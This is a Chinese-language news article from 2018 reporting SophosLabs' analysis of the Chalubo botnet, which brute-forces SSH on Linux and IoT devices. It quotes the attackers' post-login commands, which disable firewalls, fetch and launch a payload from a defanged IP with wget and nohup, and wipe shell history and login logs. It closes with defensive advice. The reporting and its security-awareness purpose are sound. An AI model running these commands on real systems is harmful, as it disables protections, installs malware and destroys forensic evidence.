應(yīng)用

技術(shù)

物聯(lián)網(wǎng)世界 >> 物聯(lián)網(wǎng)新聞 >> 物聯(lián)網(wǎng)熱點(diǎn)新聞
企業(yè)注冊(cè)個(gè)人注冊(cè)登錄

最新Chalubo僵尸網(wǎng)絡(luò)來(lái)襲,目標(biāo)指向服務(wù)器和物聯(lián)網(wǎng)設(shè)備

2018-10-24 10:41 黑客視界

導(dǎo)讀:攻擊者使用了ChaCha流密碼來(lái)加密Chalubo的主組件以及相應(yīng)的Lua腳本,而在最新的版本中,攻擊者已經(jīng)采用了更常見(jiàn)的Windows惡意軟件原理來(lái)阻止對(duì)Chalubo的檢測(cè)。不變的是,最新版本的Chalubo同樣整合了來(lái)自Xor.DDoS和Mirai惡意軟件家族的代碼。

最新Chalubo僵尸網(wǎng)絡(luò)來(lái)襲,目標(biāo)指向服務(wù)器和物聯(lián)網(wǎng)設(shè)備

網(wǎng)絡(luò)安全公司Sophos旗下SophosLabs在本周一(10月22日)發(fā)表的一篇博文中指出,他們近兩個(gè)月一直在持續(xù)關(guān)注一場(chǎng)開(kāi)始于9月初的網(wǎng)絡(luò)攻擊活動(dòng),目標(biāo)是開(kāi)啟了SSH服務(wù)器的Linux服務(wù)器。而在這場(chǎng)攻擊活動(dòng)中,攻擊者的主要目的在于傳播一種被他們稱之為“Chalubo”的最新自動(dòng)化DDos攻擊工具。

SophosLabs的分析表明,攻擊者使用了ChaCha流密碼來(lái)加密Chalubo的主組件以及相應(yīng)的Lua腳本,而在最新的版本中,攻擊者已經(jīng)采用了更常見(jiàn)的Windows惡意軟件原理來(lái)阻止對(duì)Chalubo的檢測(cè)。不變的是,最新版本的Chalubo同樣整合了來(lái)自Xor.DDoS和Mirai惡意軟件家族的代碼。

在8月下旬開(kāi)始傳播,目前已有多個(gè)版本

根據(jù)SophosLabs的說(shuō)法,Chalubo于8月下旬開(kāi)始通過(guò)網(wǎng)絡(luò)感染目標(biāo)設(shè)備,攻擊者隨后會(huì)通過(guò)在受感染設(shè)備上發(fā)出命令來(lái)檢索它。Chalubo實(shí)際上由三部分組成:下載模塊(downloader)、主bot程序(最初僅能夠在具有x86處理器架構(gòu)的系統(tǒng)上運(yùn)行)和Lua命令腳本。

到了10月中旬,攻擊者開(kāi)始發(fā)出檢索Elknot dropper(檢測(cè)為L(zhǎng)inux/DDoS-AZ)的命令,它被用于提供Chalubo(ChaCha-Lua-bot)軟件包的其余部分。

此外,目前已經(jīng)出現(xiàn)了能夠在不同處理器架構(gòu)上運(yùn)行的各種bot程序版本,包括32位和64位的ARM、x86、x86_64、MIPS、MIPSEL和PowerPC。這可能表明,這場(chǎng)網(wǎng)絡(luò)攻擊活動(dòng)的測(cè)試階段已經(jīng)結(jié)束,或許我們之后會(huì)看到基于Chalubo攻擊活動(dòng)數(shù)量的持續(xù)上升。

嘗試暴力破解密碼,強(qiáng)制登錄SSH服務(wù)器

SophosLabs表示,由他們部署的蜜罐系統(tǒng)最初在2018年9月6日記錄了相關(guān)攻擊。Chalubo的bot程序首先會(huì)嘗試暴力破解密碼,以強(qiáng)制登錄SSH服務(wù)器。

一旦攻擊者獲得了對(duì)目標(biāo)設(shè)備的訪問(wèn)權(quán)限,他們就會(huì)發(fā)出以下命令:

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

chattr -i /usr/bin/wget

chmod 755 /usr/bin/wget

yum install -y wget

wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/

chmod 777 /usr/bin/libsdes

nohup /usr/bin/libsdes > /dev/null 2>&1 &

export HISTFILE=/dev/null

rm -f /var/log/wtmp

history -c

雖然攻擊手法十分常見(jiàn),但攻擊者使用了分層方法來(lái)下載惡意組件,并且使用的加密方法對(duì)于Linux惡意軟件而言,也是我們所不常見(jiàn)的。

事實(shí)上,如果仔細(xì)查看負(fù)責(zé)持續(xù)攻擊的代碼段的話,我們能夠發(fā)現(xiàn)Chalubo已經(jīng)從Xor.DDoS惡意軟件家族中復(fù)制了DelService和AddService函數(shù)。另外,一些代碼段復(fù)制于Mirai惡意軟件,如一些隨機(jī)函數(shù)和util_local_addr函數(shù)的擴(kuò)展代碼。

最新Chalubo僵尸網(wǎng)絡(luò)來(lái)襲,目標(biāo)指向服務(wù)器和物聯(lián)網(wǎng)設(shè)備

SophosLabs提出的一些預(yù)防建議和防范措施

由于Chalubo感染目標(biāo)系統(tǒng)的主要方法是通過(guò)對(duì)使用通用的用戶名和密碼組合對(duì)SSH服務(wù)器的登錄憑證進(jìn)行暴力破解,因此SophosLabs建議SSH服務(wù)器的系統(tǒng)管理員(包括嵌入式設(shè)備)應(yīng)更改這些設(shè)備上的默認(rèn)密碼。如果可能的話,系統(tǒng)管理員最好使用SSH密鑰,而不是登錄密碼。

此外,與其他任何設(shè)備一樣,保持系統(tǒng)更新、及時(shí)安裝官方發(fā)布的修復(fù)補(bǔ)丁,以及安裝實(shí)用的防病毒軟件都會(huì)是很好的主動(dòng)防御措施。